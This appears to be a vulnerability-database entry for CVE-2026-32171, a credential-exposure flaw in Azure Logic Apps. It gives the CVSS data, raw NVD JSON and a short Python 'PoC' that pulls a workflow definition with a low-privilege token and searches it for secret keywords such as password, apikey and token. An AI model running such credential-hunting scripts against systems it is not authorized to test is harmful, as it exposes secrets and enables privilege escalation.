Security Vulnerability Report
中文
CVE-2026-32171 CVSS 8.8 HIGH

CVE-2026-32171

Published: 2026-04-14 18:17:20
Last Modified: 2026-04-27 19:58:08

Description

Insufficiently protected credentials in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:azure_logic_apps:-:*:*:*:*:*:*:* - VULNERABLE
Azure Logic Apps < 2026-04-14 安全更新

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-32171: Azure Logic Apps Credential Exposure Check # This script demonstrates how an authorized attacker might attempt to inspect # Logic App definitions for exposed credentials due to insufficient protection. import requests import base64 # Configuration SUBSCRIPTION_ID = "target-subscription-id" RESOURCE_GROUP = "target-resource-group" LOGIC_APP_NAME = "vulnerable-logic-app" ACCESS_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1Ni..." # Low-privilege user token # Azure Management API Endpoint url = f"https://management.azure.com/subscriptions/{SUBSCRIPTION_ID}/resourceGroups/{RESOURCE_GROUP}/providers/Microsoft.Logic/workflows/{LOGIC_APP_NAME}?api-version=2016-06-01" headers = { 'Authorization': f'Bearer {ACCESS_TOKEN}', 'Content-Type': 'application/json' } print(f"[*] Attempting to retrieve workflow definition for: {LOGIC_APP_NAME}") try: response = requests.get(url, headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved workflow definition.") # Check for potential credential leaks in the definition # In a vulnerable scenario, 'connectionParameters' or similar might contain secrets if 'properties' in data and 'definition' in data['properties']: definition_str = str(data['properties']['definition']) # Keywords indicating potential secrets sensitive_keywords = ['password', 'apikey', 'secret', 'connectionString', 'token'] found_keywords = [k for k in sensitive_keywords if k.lower() in definition_str.lower()] if found_keywords: print(f"[!] Potential sensitive keywords found in definition: {found_keywords}") print("[!] Vulnerability Confirmed: Credentials may be exposed to low-privilege users.") else: print("[-] No obvious sensitive keywords found in static definition.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32171", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:19.843", "lastModified": "2026-04-27T19:58:07.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficiently protected credentials in Azure Logic Apps allows an authorized attacker to elevate privileges over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:azure_logic_apps:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6568E5D-75D4-4A94-BFBF-3FA619F9FDD4"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32171", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}